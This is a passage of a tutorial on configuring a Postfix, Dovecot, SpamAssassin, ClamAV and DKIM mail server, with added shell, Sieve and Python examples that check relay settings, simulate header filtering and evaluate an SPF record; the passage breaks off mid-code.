<span class="s s-Atom">smtpd_sasl_path</span> <span class="o">=</span> <span class="s s-Atom">private</span><span class="o">/</span><span class="s s-Atom">auth</span>
<span class="s s-Atom">smtpd_sasl_security_options</span> <span class="o">=</span> <span class="s s-Atom">noanonymous</span>
<span class="s s-Atom">smtpd_sasl_tls_security_options</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">smtpd_sasl_security_options</span>
<span class="s s-Atom">smtpd_sasl_local_domain</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">mydomain</span>
<span class="s s-Atom">smtpd_sasl_authenticated_header</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">broken_sasl_auth_clients</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">###############</span>
<span class="s s-Atom">#</span> <span class="nv">VIRTUAL</span> <span class="nv">MAPS</span> <span class="nv">PARAMETERS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">###############</span>
<span class="s s-Atom">virtual_uid_maps</span> <span class="o">=</span> <span class="nn">static</span><span class="p">:</span><span class="mi">5000</span>
<span class="s s-Atom">virtual_gid_maps</span> <span class="o">=</span> <span class="nn">static</span><span class="p">:</span><span class="mi">5000</span>
<span class="s s-Atom">virtual_minimum_uid</span> <span class="o">=</span> <span class="mi">5000</span>
<span class="s s-Atom">virtual_mailbox_base</span> <span class="o">=</span> <span class="o">/</span><span class="s s-Atom">var</span><span class="o">/</span><span class="s s-Atom">mail</span>
<span class="s s-Atom">virtual_transport</span> <span class="o">=</span> <span class="nn">lmtp</span><span class="p">:</span><span class="nn">unix</span><span class="p">:</span><span class="s s-Atom">private</span><span class="o">/</span><span class="s s-Atom">dovecot</span><span class="o">-</span><span class="s s-Atom">lmtp</span>
<span class="s s-Atom">virtual_mailbox_domains</span> <span class="o">=</span> <span class="nn">mysql</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">postfix</span><span class="o">/</span><span class="s s-Atom">mysql</span><span class="o">-</span><span class="s s-Atom">virtual</span><span class="o">-</span><span class="s s-Atom">mailbox</span><span class="o">-</span><span class="s s-Atom">domains</span><span class="p">.</span><span class="s s-Atom">cf</span>
<span class="s s-Atom">virtual_mailbox_maps</span> <span class="o">=</span> <span class="nn">mysql</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">postfix</span><span class="o">/</span><span class="s s-Atom">mysql</span><span class="o">-</span><span class="s s-Atom">virtual</span><span class="o">-</span><span class="s s-Atom">mailbox</span><span class="o">-</span><span class="s s-Atom">maps</span><span class="p">.</span><span class="s s-Atom">cf</span>
<span class="s s-Atom">virtual_alias_maps</span> <span class="o">=</span> <span class="nn">mysql</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">postfix</span><span class="o">/</span><span class="s s-Atom">mysql</span><span class="o">-</span><span class="s s-Atom">virtual</span><span class="o">-</span><span class="s s-Atom">alias</span><span class="o">-</span><span class="s s-Atom">maps</span><span class="p">.</span><span class="s s-Atom">cf</span>
<span class="s s-Atom">###########</span>
<span class="s s-Atom">#</span> <span class="nv">ERROR</span> <span class="nv">REPORTING</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">###########</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">notify_classes</span> <span class="o">=</span> <span class="s s-Atom">bounce</span><span class="p">,</span> <span class="s s-Atom">delay</span><span class="p">,</span> <span class="s s-Atom">resource</span><span class="p">,</span> <span class="s s-Atom">software</span>
<span class="s s-Atom">notify_classes</span> <span class="o">=</span> <span class="s s-Atom">resource</span><span class="p">,</span> <span class="s s-Atom">software</span>
<span class="s s-Atom">error_notice_recipient</span> <span class="o">=</span> <span class="s s-Atom">admin@domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">delay_notice_recipient</span> <span class="o">=</span> <span class="s s-Atom">admin@domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">bounce_notice_recipient</span> <span class="o">=</span> <span class="s s-Atom">admin@domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">#</span> <span class="mi">2</span><span class="s s-Atom">bounce_notice_recipient</span> <span class="o">=</span> <span class="s s-Atom">admin@domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">#########</span>
<span class="s s-Atom">#</span> <span class="nv">RESTRICTIONS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">#########</span>
<span class="s s-Atom">smtpd_recipient_restrictions</span> <span class="o">=</span>
    <span class="s s-Atom">permit_mynetworks</span><span class="p">,</span>
    <span class="s s-Atom">permit_sasl_authenticated</span><span class="p">,</span>
    <span class="s s-Atom">reject_non_fqdn_recipient</span><span class="p">,</span>
    <span class="s s-Atom">reject_unauth_destination</span><span class="p">,</span>
    <span class="s s-Atom">reject_unknown_recipient_domain</span><span class="p">,</span>
    <span class="s s-Atom">reject_rbl_client</span> <span class="s s-Atom">zen</span><span class="p">.</span><span class="s s-Atom">spamhaus</span><span class="p">.</span><span class="s s-Atom">org</span>
<span class="s s-Atom">smtpd_helo_restrictions</span> <span class="o">=</span>
    <span class="s s-Atom">permit_mynetworks</span><span class="p">,</span>
    <span class="s s-Atom">permit_sasl_authenticated</span><span class="p">,</span>
    <span class="s s-Atom">reject_invalid_helo_hostname</span><span class="p">,</span>
    <span class="s s-Atom">reject_non_fqdn_helo_hostname</span>
    <span class="s s-Atom">#</span> <span class="s s-Atom">reject_unknown_helo_hostname</span>
<span class="s s-Atom">smtpd_client_restrictions</span> <span class="o">=</span>
    <span class="s s-Atom">permit_mynetworks</span><span class="p">,</span>
    <span class="s s-Atom">permit_inet_interfaces</span><span class="p">,</span>
    <span class="s s-Atom">permit_sasl_authenticated</span>
    <span class="s s-Atom">#</span> <span class="s s-Atom">reject_plaintext_session</span><span class="p">,</span>
    <span class="s s-Atom">#</span> <span class="s s-Atom">reject_unauth_pipelining</span>
<span class="s s-Atom">smtpd_sender_restrictions</span> <span class="o">=</span>
    <span class="s s-Atom">reject_non_fqdn_sender</span><span class="p">,</span>
    <span class="s s-Atom">reject_unknown_sender_domain</span>
</code></pre></div>
<h2>/etc/postfix/master.cf</h2>
<div class="highlight"><pre><span></span><code>smtp inet n - - - - smtpd
submission inet n - - - - smtpd
  -o syslog_name=postfix/submission
  -o smtpd_tls_dh1024_param_file=<span class="cp">${</span><span class="n">config_directory</span><span class="cp">}</span>/dh2048.pem
  -o smtpd_tls_security_level=encrypt
  -o smtpd_sasl_auth_enable=yes
  -o smtpd_client_restrictions=permit_sasl_authenticated,reject
</code></pre></div>
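<p>An added check, not from the original article, for the settings in <code>main.cf</code> and <code>master.cf</code> that matter most: <code>reject_unauth_destination</code> (without it the server relays for anyone), <code>smtpd_tls_auth_only</code> and <code>noanonymous</code> (no passwords over plain text, no anonymous AUTH), the SSLv2/SSLv3 exclusion, and the <code>smtpd_tls_security_level=encrypt</code> override on the submission service. The script parses Postfix's logical lines (a line starting with whitespace continues the previous one, which is why the indentation above matters) and is run here against a constructed copy of the article's values and a weakened copy; the file names are assumptions.</p>

```shell
#!/bin/sh
# Added example, not from the original article: a lint for the main.cf and
# master.cf values above that decide whether the server relays for strangers
# or accepts passwords in the clear. Postfix joins a line that starts with
# whitespace onto the previous logical line, so the parser does the same.
# It is exercised on constructed copies of the article's settings and on
# weakened copies; the file names are assumptions.

# postfix_params FILE: one "name=value" per logical line, whitespace collapsed.
postfix_params() {
    awk '
        /^[ \t]*#/ { next }                        # comment line
        /^[ \t]*$/ { next }                        # blank line
        /^[ \t]/   { cur = cur " " $0; next }      # continuation line
        { if (cur != "") print cur; cur = $0 }
        END { if (cur != "") print cur }
    ' "$1" | sed 's/[[:space:]]*=[[:space:]]*/=/; s/[[:space:]][[:space:]]*/ /g'
}

# param FILE NAME: the value of NAME (empty if unset).
param() {
    postfix_params "$1" | awk -F= -v n="$2" '$1 == n { sub(/^[^=]*=/, ""); print; exit }'
}

# has_word VALUE WORD: true if WORD is one of the comma/space separated items.
has_word() {
    printf '%s\n' "$1" | tr ', ' '\n\n' | grep -qxF "$2"
}

# lint_main_cf FILE: print every weak setting; succeed only if all checks pass.
lint_main_cf() {
    f=$1; rc=0
    has_word "$(param "$f" smtpd_recipient_restrictions)" reject_unauth_destination ||
        { echo "FAIL $f: smtpd_recipient_restrictions lacks reject_unauth_destination (open relay)"; rc=1; }
    [ "$(param "$f" smtpd_tls_auth_only)" = yes ] ||
        { echo "FAIL $f: smtpd_tls_auth_only is not yes (AUTH offered before STARTTLS)"; rc=1; }
    has_word "$(param "$f" smtpd_sasl_security_options)" noanonymous ||
        { echo "FAIL $f: smtpd_sasl_security_options lacks noanonymous"; rc=1; }
    protos=$(param "$f" smtpd_tls_protocols)
    { has_word "$protos" '!SSLv2' && has_word "$protos" '!SSLv3'; } ||
        { echo "FAIL $f: smtpd_tls_protocols does not exclude SSLv2/SSLv3"; rc=1; }
    [ "$rc" -eq 0 ] && echo "OK   $f: relay and AUTH settings look sane"
    return "$rc"
}

# lint_master_cf FILE: the submission service must force TLS; its "-o" lines
# start with whitespace, so the same parser joins them onto the service line.
lint_master_cf() {
    case "$(postfix_params "$1" | grep '^submission ')" in
        *smtpd_tls_security_level=encrypt*) echo "OK   $1: submission requires TLS" ;;
        *) echo "FAIL $1: submission lacks -o smtpd_tls_security_level=encrypt"; return 1 ;;
    esac
}

# write_demo_configs DIR: constructed main.cf/master.cf with the article's
# values, plus weakened copies (relay check removed, plaintext AUTH allowed,
# submission without mandatory TLS).
write_demo_configs() {
    cat > "$1/main.cf" <<'EOF'
smtpd_tls_auth_only = yes
smtpd_tls_security_level = may
smtpd_tls_protocols = !SSLv2, !SSLv3
smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous
smtpd_recipient_restrictions =
    permit_mynetworks,
    permit_sasl_authenticated,
    reject_non_fqdn_recipient,
    reject_unauth_destination,
    reject_unknown_recipient_domain,
    reject_rbl_client zen.spamhaus.org
smtpd_helo_restrictions =
    permit_mynetworks,
    reject_invalid_helo_hostname
    # reject_unknown_helo_hostname
EOF
    cat > "$1/master.cf" <<'EOF'
smtp inet n - - - - smtpd
submission inet n - - - - smtpd
  -o syslog_name=postfix/submission
  -o smtpd_tls_security_level=encrypt
  -o smtpd_sasl_auth_enable=yes
  -o smtpd_client_restrictions=permit_sasl_authenticated,reject
EOF
    sed -e '/reject_unauth_destination,/d' -e 's/^smtpd_tls_auth_only = yes/smtpd_tls_auth_only = no/' \
        "$1/main.cf" > "$1/main-weak.cf"
    sed '/smtpd_tls_security_level=encrypt/d' "$1/master.cf" > "$1/master-weak.cf"
}
```

<p>Against a live server, run <code>lint_main_cf /etc/postfix/main.cf</code> and <code>lint_master_cf /etc/postfix/master.cf</code>. <code>postconf -n</code> prints the parameters as Postfix itself resolved them and is the reference if the two disagree.</p>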
<h2>Hide information</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/header_checks</span>
<span class="err">/^Received:.*with ESMTPSA/ IGNORE</span>
<span class="err">/^X-Originating-IP:/ IGNORE</span>
<span class="err">/^X-Mailer:/ IGNORE</span>
<span class="err">/^User-Agent:/ IGNORE</span>
<span class="err"># vim /etc/postfix/main.cf</span>
<span class="err">mime_header_checks = regexp:/etc/postfix/header_checks</span>
<span class="err">header_checks = regexp:/etc/postfix/header_checks</span>
</code></pre></div>
<p>Reload Postfix so that the changes take effect:</p>
<div class="highlight"><pre><span></span><code>postmap /etc/postfix/header_checks
postfix reload
</code></pre></div>
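<p>To see what the table above actually does, an added example that is not part of the original article: a small simulator that applies a regexp-style <code>header_checks</code> file to the header block of a message and prints the surviving headers, matching each logical header (folded continuation lines joined) case-insensitively against the patterns in file order, first match wins, as Postfix does. Only <code>Received:</code> lines carrying <code>with ESMTPSA</code>, i.e. the hop recorded for your own authenticated users, are removed, so the trail left by other mail servers stays intact for troubleshooting. The sample message and the temporary files are constructed.</p>

```shell
#!/bin/sh
# Added example, not from the original article. It applies a regexp-style
# header_checks table (the one above, written to a temp file) to the header
# block of a message on stdin and prints the headers Postfix would keep.
# The evaluation mirrors Postfix: every logical header (a folded header's
# continuation lines joined) is matched case-insensitively against the
# patterns in file order, and the first match decides. Only "Received:"
# lines carrying "with ESMTPSA" (authenticated submissions by your own users)
# are dropped, so the trail left by other MTAs stays available for
# troubleshooting. The message and file paths are constructed assumptions.

# apply_header_checks CHECKS_FILE  < message
apply_header_checks() {
    awk -v checks="$1" '
    # first matching pattern wins; newlines of a folded header count as spaces
    function decide(hdr,   h, i) {
        h = hdr; gsub(/\n[ \t]*/, " ", h)
        for (i = 1; i <= n; i++)
            if (tolower(h) ~ tolower(pat[i])) return act[i]
        return "OK"
    }
    function flush() {
        if (cur != "" && decide(cur) != "IGNORE") print cur
        cur = ""
    }
    BEGIN {
        n = 0
        while ((getline line < checks) > 0) {
            if (line ~ /^[ \t]*#/ || line ~ /^[ \t]*$/) continue   # comment/blank
            a = line; sub(/^.*\/[ \t]+/, "", a)    # ACTION after the last "/ "
            p = substr(line, 1, length(line) - length(a))
            sub(/[ \t]+$/, "", p)
            p = substr(p, 2, length(p) - 2)        # strip the enclosing slashes
            n++; pat[n] = p; act[n] = a
        }
    }
    /^$/     { exit }                     # blank line: end of the header block
    /^[ \t]/ { cur = cur "\n" $0; next }  # folded continuation line
    { flush(); cur = $0 }
    END { flush() }
    '
}

# kept_header_names CHECKS_FILE < message: space separated names of survivors
kept_header_names() {
    names=$(apply_header_checks "$1" | grep -v '^[[:space:]]' | cut -d: -f1 | tr '\n' ' ')
    printf '%s\n' "${names% }"
}

# write_demo_checks: the article's table in a temp file; prints its path
write_demo_checks() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# Received line added for authenticated (ESMTPSA) submissions
/^Received:.*with ESMTPSA/ IGNORE
/^X-Originating-IP:/ IGNORE
/^X-Mailer:/ IGNORE
/^User-Agent:/ IGNORE
EOF
    echo "$f"
}

# demo_message: constructed message with two Received hops (one ESMTPSA
# submission, one plain ESMTPS relay) and a few client headers
demo_message() {
    printf '%s\n' \
        'Received: from [192.0.2.10] (client.example.net)' \
        '  by mail.domain.tld (Postfix) with ESMTPSA id 4ABC' \
        '  for <bob@example.org>; Sat, 24 Nov 2018 10:20:00 +0100' \
        'Received: from mx.example.org (mx.example.org [198.51.100.1])' \
        '  by mail.domain.tld (Postfix) with ESMTPS id 4DEF' \
        'From: alice@domain.tld' \
        'X-Mailer: Some Mail Client 1.0' \
        'User-Agent: Some Mail Client 1.0' \
        'X-Originating-IP: [192.0.2.10]' \
        'Subject: test' \
        '' \
        'body text'
}
```

<p>Against the real file, Postfix's own <code>postmap -q "Received: ... with ESMTPSA ..." regexp:/etc/postfix/header_checks</code> gives the action for a single header line; the simulator is only for seeing the effect on a whole message offline.</p>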
<h1>Postfixadmin</h1>
<p>Postfix Admin is a web interface for managing Postfix's virtual mailboxes, aliases and users. It also lets you change the password of a mail address from this console.</p>
<div class="highlight"><pre><span></span><code>apt-get install php5-imap
<span class="nb">cd</span> /var/www
wget http://downloads.sourceforge.net/project/postfixadmin/postfixadmin/postfixadmin-2.93/postfixadmin-2.93.tar.gz
tar -xzf postfixadmin-2.93.tar.gz
mv postfixadmin-2.93 postfixadmin
rm -rf postfixadmin-2.93.tar.gz
chown -R www-data:www-data postfixadmin
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="x"># vim /var/www/postfixadmin/config.inc.php</span>
<span class="x">$CONF['configured'] = true;</span>
<span class="x">$CONF['default_language'] = 'fr';</span>
<span class="x">$CONF['database_type'] = 'mysqli';</span>
<span class="x">$CONF['database_host'] = 'localhost';</span>
<span class="x">$CONF['database_user'] = 'postfix';</span>
<span class="x">$CONF['database_password'] = 'MOT DE PASSE';</span>
<span class="x">$CONF['database_name'] = 'postfix';</span>
<span class="x">$CONF['admin_email'] = 'admin@domain.tld';</span>
<span class="x">$CONF['domain_path'] = 'YES';</span>
<span class="x">$CONF['domain_in_mailbox'] = 'NO';</span>
<span class="x">$CONF['fetchmail'] = 'NO';</span>
</code></pre></div>
<p>Create the subdomain on nginx:</p>
<div class="highlight"><pre><span></span><code><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">80</span><span class="p">;</span>
<span class="kn">server_name</span> <span class="s">postfixadmin.domain.tld</span><span class="p">;</span>
<span class="kn">root</span> <span class="s">/var/www/postfixadmin</span><span class="p">;</span>
<span class="kn">index</span> <span class="s">index.php</span><span class="p">;</span>
<span class="kn">charset</span> <span class="s">utf-8</span><span class="p">;</span>
<span class="kn">location</span> <span class="s">/</span> <span class="p">{</span>
<span class="kn">try_files</span> <span class="nv">$uri</span> <span class="nv">$uri/</span> <span class="s">index.php</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span><span class="sr">*</span> <span class="s">\.php</span>$ <span class="p">{</span>
<span class="kn">include</span> <span class="s">/etc/nginx/fastcgi_params</span><span class="p">;</span>
<span class="kn">fastcgi_pass</span> <span class="s">unix:/var/run/php5-fpm.sock</span><span class="p">;</span>
<span class="kn">fastcgi_index</span> <span class="s">index.php</span><span class="p">;</span>
<span class="kn">fastcgi_param</span> <span class="s">SCRIPT_FILENAME</span> <span class="nv">$document_root$fastcgi_script_name</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>Restart nginx to pick up the new subdomain:</p>
<div class="highlight"><pre><span></span><code>service nginx restart
</code></pre></div>
<p>You can now browse to your subdomain's URL to configure Postfix Admin through a web browser: http://postfixadmin.domain.tld/setup.php</p>
<p>It will give you a hash that you must enter in the configuration:</p>
<div class="highlight"><pre><span></span><code><span class="x"># vim /var/www/postfixadmin/config.inc.php</span>
<span class="x">$CONF['setup_password'] = 'HASH';</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/x04544fh"> Dovecot</h1>
<p>Dovecot is an IMAP and POP3 server for UNIX and UNIX-like operating systems, designed with security as its primary goal. Dovecot is dual-licensed under the MIT license and GPL version 2.</p>
<div class="highlight"><pre><span></span><code>apt-get install dovecot-core dovecot-imapd dovecot-lmtpd dovecot-mysql
</code></pre></div>
<h2>SSL/TLS</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/dovecot/conf.d/10-ssl.conf</span>
<span class="err">ssl = required</span>
<span class="err">ssl_cert = &lt;/etc/ssl/certs/mailserver.crt</span>
<span class="err">ssl_key = &lt;/etc/ssl/private/mailserver.key</span>
<span class="err">ssl_protocols = !SSLv2 !SSLv3</span>
<span class="err">ssl_cipher_list = ALL:!aNULL:!eNULL:!LOW:!MEDIUM:!EXP:!RC2:!RC4:!DES:!3DES:!MD5:!PSK:!SRP:!DSS:!AECDH:!ADH:@STRENGTH</span>
<span class="err">ssl_prefer_server_ciphers = yes</span>
<span class="err">ssl_dh_parameters_length = 2048</span>
</code></pre></div>
<h1>Spamassassin</h1>
<p>SpamAssassin is free software led by the Apache Software Foundation, the authors of the very well-known Apache HTTP Server. Its purpose is to filter email traffic in order to eliminate messages identified as spam or unsolicited email.</p>
<div class="highlight"><pre><span></span><code># vim /etc/postfix/master.cf
smtp      inet  n       -       -       -       -       smtpd
  -o content_filter=spamassassin
submission inet n       -       -       -       -       smtpd
  -o content_filter=spamassassin
spamassassin unix -     n       n       -       -       pipe
  user=debian-spamd argv=/usr/bin/spamc -f -e /usr/sbin/sendmail -oi -f <span class="cp">${</span><span class="n">sender</span><span class="cp">}</span> <span class="cp">${</span><span class="n">recipient</span><span class="cp">}</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>service postfix reload
</code></pre></div>
<p>To make spam more visible in the mailbox, headers can be added to scanned messages:</p>
<div class="highlight"><pre><span></span><code><span class="c"># vim /etc/spamassassin/local.cf</span>
<span class="nb">rewrite_header</span> Subject *****SPAM*****
<span class="nb">report_safe</span> <span class="m">0</span>
<span class="nb">whitelist_from</span> *@domain.tld
<span class="nb">add_header</span> <span class="k">all</span> Report _REPORT_
<span class="nb">add_header</span> spam Flag _YESNOCAPS_
<span class="nb">add_header</span> <span class="k">all</span> Status _YESNO_, score=_SCORE_ required=_REQD_ tests=_TESTS_ autolearn=_AUTOLEARN_ version=_VERSION_
<span class="nb">add_header</span> <span class="k">all</span> Level _STARS(*)_
<span class="nb">add_header</span> <span class="k">all</span> Checker-Version SpamAssassin _VERSION_ (_SUBVERSION_) <span class="k">on</span> _HOSTNAME_
</code></pre></div>
<p>Enable the service at system startup:</p>
<div class="highlight"><pre><span></span><code>systemctl <span class="nb">enable</span> spamassassin.service
service spamassassin start
</code></pre></div>
<p>Add automatic updates of the filtering rules:</p>
<div class="highlight"><pre><span></span><code><span class="err"># crontab -e</span>
<span class="err"># Update SpamAssassin rules</span>
<span class="err">20 02 * * * /usr/bin/sa-update</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/Dj57plDV"> ClamAV</h1>
<p>ClamAV is an open source antivirus engine for detecting trojans, viruses, malware and other malicious threats.</p>
<div class="highlight"><pre><span></span><code>apt-get install clamav-milter
service clamav-freshclam stop
freshclam
service clamav-freshclam start
</code></pre></div>
<h2>Integration with Postfix</h2>
<div class="highlight"><pre><span></span><code>mkdir /var/spool/postfix/clamav
chown clamav /var/spool/postfix/clamav
dpkg-reconfigure clamav-milter
</code></pre></div>
<h2>Answers</h2>
<div class="highlight"><pre><span></span><code><span class="err">Handle configuration automatically --> yes</span>
<span class="err">User for daemon --> clamav</span>
<span class="err">Additional groups --> leave the field empty</span>
<span class="err">path to socket --> /var/spool/postfix/clamav/clamav-milter.ctl</span>
<span class="err">group owner for the socket --> clamav</span>
<span class="err">permissions (mode) for socket --> 666</span>
<span class="err">remove stale socket --> yes</span>
<span class="err">wait timeout for clamd --> 120</span>
<span class="err">foreground --> no</span>
<span class="err">chroot --> leave the field empty</span>
<span class="err">pid file --> /var/run/clamav/clamav-milter.pid</span>
<span class="err">temporary path --> /tmp</span>
<span class="err">clamd socket --> unix:/var/run/clamav/clamd.ctl</span>
<span class="err">hosts excluded for scanning --> leave the field empty</span>
<span class="err">mail whitelist --> leave the field empty</span>
<span class="err">action for "infected" mail --> reject</span>
<span class="err">action on error --> defer</span>
<span class="err">reason for rejection --> Rejecting harmful e-mail: %v found.</span>
<span class="err">headers --> replace</span>
<span class="err">log file --> /var/log/clamav/clamav-milter.log</span>
<span class="err">disable log file locking --> no</span>
<span class="err">maximum log file size --> 50</span>
<span class="err">log time --> yes</span>
<span class="err">use syslog --> no</span>
<span class="err">log facility (type of syslog message) --> LOG_LOCAL6</span>
<span class="err">verbose logging --> no</span>
<span class="err">log level when infected --> off</span>
<span class="err">log level when no threat --> off</span>
<span class="err">size limit for scanned messages --> 25</span>
<span class="err">support multiple recipients --> no</span>
<span class="err">enable log rotation --> yes</span>
</code></pre></div>
<h2>Select the closest mirror</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/clamav/freshclam.conf</span>
<span class="err">DatabaseMirror db.fr.clamav.net</span>
</code></pre></div>
<h2>Automatic virus database update</h2>
<div class="highlight"><pre><span></span><code><span class="err"># crontab -e</span>
<span class="err">15 * * * * /usr/bin/freshclam --quiet</span>
</code></pre></div>
<h2>Wiring into Postfix</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/main.cf</span>
<span class="err">smtpd_milters = unix:/opendkim/opendkim.sock, unix:/opendmarc/opendmarc.sock, unix:/clamav/clamav-milter.ctl</span>
</code></pre></div>
<h2>Restart to apply the changes</h2>
<div class="highlight"><pre><span></span><code>service clamav-daemon restart
service postfix reload
</code></pre></div>
<h1>Sieve</h1>
<p>The Dovecot Sieve plugin provides mail filtering facilities at time of final message delivery using the Sieve (RFC 5228) language. By writing Sieve scripts, users can customize how messages are delivered, e.g. whether they are forwarded or stored in special folders. The Sieve language is meant to be simple, extensible and system independent. And, unlike most other mail filtering script languages, it does not allow users to execute arbitrary programs. This is particularly useful to prevent virtual users from having full access to the mail store. The intention of the language is to make it impossible for users to do anything more complex (and dangerous) than write simple mail filters.</p>
<div class="highlight"><pre><span></span><code>apt install dovecot-sieve dovecot-managesieved
apt install sieverules
apt install sieve
chmod <span class="m">755</span> /var/vmail/domain.tld -R
chown vmail:vmail /var/vmail/domain.tld -R
</code></pre></div>
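<p>As an added example (not part of the original guide), a per-user Sieve script that acts on the headers the SpamAssassin <code>local.cf</code> above adds (SpamAssassin prefixes every <code>add_header</code> name with <code>X-Spam-</code>); it assumes a mailbox named <code>Junk</code> exists and is saved as the user's active script (<code>~/.dovecot.sieve</code> by default).</p>

```sieve
# Added example, not from the original guide. Files spam using the headers
# that the SpamAssassin local.cf above adds to every scanned message.
# Assumes a mailbox named "Junk" exists (hypothetical folder name).
require ["fileinto"];

# X-Spam-Level comes from "add_header all Level _STARS(*)_": one '*' per
# point of score. Ten or more stars: drop the message without delivering it.
if header :contains "X-Spam-Level" "**********" {
    discard;
    stop;
}

# X-Spam-Flag comes from "add_header spam Flag _YESNOCAPS_" and is only
# present (with the value YES) on messages SpamAssassin classified as spam.
if header :is "X-Spam-Flag" "YES" {
    fileinto "Junk";
    stop;
}

# Everything else reaches INBOX through Sieve's implicit keep.
```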
<h1>Add a new domain name</h1>
<p>Add the domain in Postfixadmin,
then create the mail account via Postfixadmin.</p>
<h2>DKIM</h2>
<p><em>DKIM (DomainKeys Identified Mail) is a reliable standard for authenticating the domain name of an email's sender. It provides effective protection against spam and phishing.</em></p>
<p><em>DKIM works by cryptographically signing the body of the message and part of its headers. A DKIM signature therefore verifies the authenticity of the sending domain and guarantees the integrity of the message. DKIM operates at the application layer of the OSI model, so it provides a second layer of protection for email protocols such as SMTP, IMAP and POP, on top of using those protocols in their secure modes (POPS, IMAPS).</em></p>
<p>Add the domain to the domains recognized by OpenDKIM</p>
<div class="highlight"><pre><span></span><code><span class="c1"># vim /etc/opendkim/TrustedHosts</span>
*.domain.tld
</code></pre></div>
<p>Add the mapping between the signing key and the domain name</p>
<div class="highlight"><pre><span></span><code><span class="c1"># vim /etc/opendkim/KeyTable</span>
mail._domainkey.domain.tld domain.tld:mail:/etc/opendkim/keys/domain.tld/mail.private
</code></pre></div>
<p>Add the email addresses to be signed</p>
<div class="highlight"><pre><span></span><code><span class="c1"># vim /etc/opendkim/SigningTable</span>
*@domain.tld mail._domainkey.domain.tld
</code></pre></div>
<p>Create the signing key</p>
<div class="highlight"><pre><span></span><code>mkdir /etc/opendkim/keys/domain.tld
<span class="nb">cd</span> /etc/opendkim/keys/domain.tld
opendkim-genkey -s mail -d domain.tld -b <span class="m">1024</span>
chown opendkim:opendkim mail.private
cat mail.txt
</code></pre></div>
<p>Restart the services to apply the changes</p>
<div class="highlight"><pre><span></span><code>service postfix restart
service dovecot restart
service opendkim restart
</code></pre></div>
<h2>DNS</h2>
<p>To use the mail server with your domain name, you must add the following DNS records:</p>
<div class="highlight"><pre><span></span><code><span class="p">;</span> <span class="n">webmail</span>
<span class="n">mail</span> <span class="k">IN</span> <span class="n">A</span> <span class="mi">1</span><span class="p">.</span><span class="mi">2</span><span class="p">.</span><span class="mi">3</span><span class="p">.</span><span class="mi">4</span>
<span class="p">;</span> <span class="n">mail</span> <span class="n">server</span>
<span class="o">@</span> <span class="k">IN</span> <span class="n">MX</span> <span class="mi">10</span> <span class="n">smtp</span>
<span class="n">smtp</span> <span class="k">IN</span> <span class="n">A</span> <span class="mi">1</span><span class="p">.</span><span class="mi">2</span><span class="p">.</span><span class="mi">3</span><span class="p">.</span><span class="mi">4</span>
<span class="o">@</span> <span class="k">IN</span> <span class="n">TXT</span> <span class="ss">"v=spf1 a mx ip4:1.2.3.4 ~all"</span>
</code></pre></div>
<p>If you configured OpenDKIM (strongly recommended), you must also publish the public key in a DNS TXT record for the domain:</p>
<div class="highlight"><pre><span></span><code><span class="err">mail._domainkey IN TXT "v=DKIM1; k=rsa; p=VOTRE CLE PUBLIQUE"</span>
</code></pre></div>
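<p>The SPF record in the zone above, evaluated end to end: an added example, not code from the original guide, that implements only the mechanisms that record uses (<code>a</code>, <code>mx</code>, <code>ip4</code>, <code>all</code>) against a constructed lookup table standing in for DNS; <code>strict.tld</code> and <code>backup.domain.tld</code> are hypothetical names.</p>

```python
"""Added example, not from the original guide: a minimal evaluator for the
SPF record published above, "v=spf1 a mx ip4:1.2.3.4 ~all".
It implements only the mechanisms that record uses (a, mx, ip4, all) and
takes a caller-supplied lookup table instead of querying DNS, so it runs
offline. Every name and address in SAMPLE_DNS is constructed sample data."""
import ipaddress

# Constructed stand-in for DNS, resolving the zone from the page by hand.
# 1.2.3.4 is the placeholder address the page uses; strict.tld is hypothetical.
SAMPLE_DNS = {
    ("domain.tld", "TXT"): ["v=spf1 a mx ip4:1.2.3.4 ~all"],
    ("domain.tld", "A"): ["1.2.3.4"],
    ("domain.tld", "MX"): ["smtp.domain.tld"],
    ("smtp.domain.tld", "A"): ["1.2.3.4"],
    ("strict.tld", "TXT"): ["v=spf1 mx -all"],
    ("strict.tld", "MX"): ["backup.domain.tld"],
    ("backup.domain.tld", "A"): ["5.6.7.8"],
}

# Result that applies when a mechanism with the given qualifier matches (RFC 7208).
QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup(dns, name, rtype):
    """Return the records of type rtype for name from the lookup table."""
    return dns.get((name.lower(), rtype), [])


def parse_spf(record):
    """Split an SPF record into (qualifier, mechanism, argument) triples."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    parsed = []
    for term in terms[1:]:
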